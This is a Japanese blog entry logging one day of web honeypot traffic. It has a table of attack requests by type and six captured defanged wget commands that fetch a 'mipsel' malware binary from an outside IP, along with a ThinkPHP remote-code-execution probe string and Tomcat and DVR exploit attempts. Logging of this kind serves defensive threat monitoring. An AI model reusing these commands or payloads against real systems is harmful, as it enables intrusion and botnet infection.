WOWHoneypot観察(225日目)
2019/10/27(日)
トータルは2147件でした。
ハンティングログは以下です。
| 174.100.54[.]91 wget+hxxp[:]//185.172.110[.]220/mipsel |
| 142.129.210[.]152 wget+hxxp[:]//185.172.110[.]220/mipsel |
| 154.56.69[.]150 wget+hxxp[:]//185.172.110[.]220/mipsel |
| 92.253.52[.]139 wget+hxxp[:]//185.172.110[.]220/mipsel |
| 149.200.177[.]138 wget+hxxp[:]//185.172.110[.]220/mipsel |
| 46.151.44[.]54 wget+hxxp[:]//185.172.110[.]220/mipsel |
www.virustotal.com
www.virustotal.com
IPのロケーション別の件数は以下です。
| ウルグアイ | 1712 |
| スイス | 360 |
| アメリカ | 19 |
| 中国 | 11 |
| ブラジル | 7 |
| オランダ | 5 |
| スペイン | 5 |
| ロシア | 3 |
| イタリア | 3 |
| インドネシア | 3 |
| トルコ | 2 |
| ウクライナ | 2 |
| ブルンジ | 2 |
| ヨルダン | 2 |
| ポーランド | 2 |
| チリ | 1 |
| メキシコ | 1 |
| インド | 1 |
| フランス | 1 |
| ギリシャ | 1 |
| イラン | 1 |
| ケニア | 1 |
| エクアドル | 1 |
| パキスタン | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 2075 | GET /manager/html | |
| 44 | アクセス | GET / |
| 6 | Tomcat管理ページに対するブルートフォース攻撃Tomcat管理ページに対するブルートフォース攻撃 | POST /tmUnblock.cgi |
| 3 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 2 | Tomcatの調査 | GET /manager/text/list |
| 1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 1 | ログインページの調査 | GET login.cgi |
| 1 | 不正中継の調査 | GET hxxp[:]//www.rx2.eu/ivy/azenv.php?lang=eng |
| 1 | 不明 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
| 1 | Ciscoのcfgファイルの調査 | GET /pps/cisco/cisco.cfg |
| 1 | アクセス | GET /favicon.ico |
| 1 | phpMyAdminの調査 | GET /admin-scripts.asp |
| 1 | 不正中継の試み | CONNECT www.rx2.eu:443 |
| 1 | 不正中継の試み | CONNECT www.google.com:443 |
| 1 | 不正中継の試み | CONNECT microsoft-com.mail.protection.outlook.com:25 |
にほんブログ村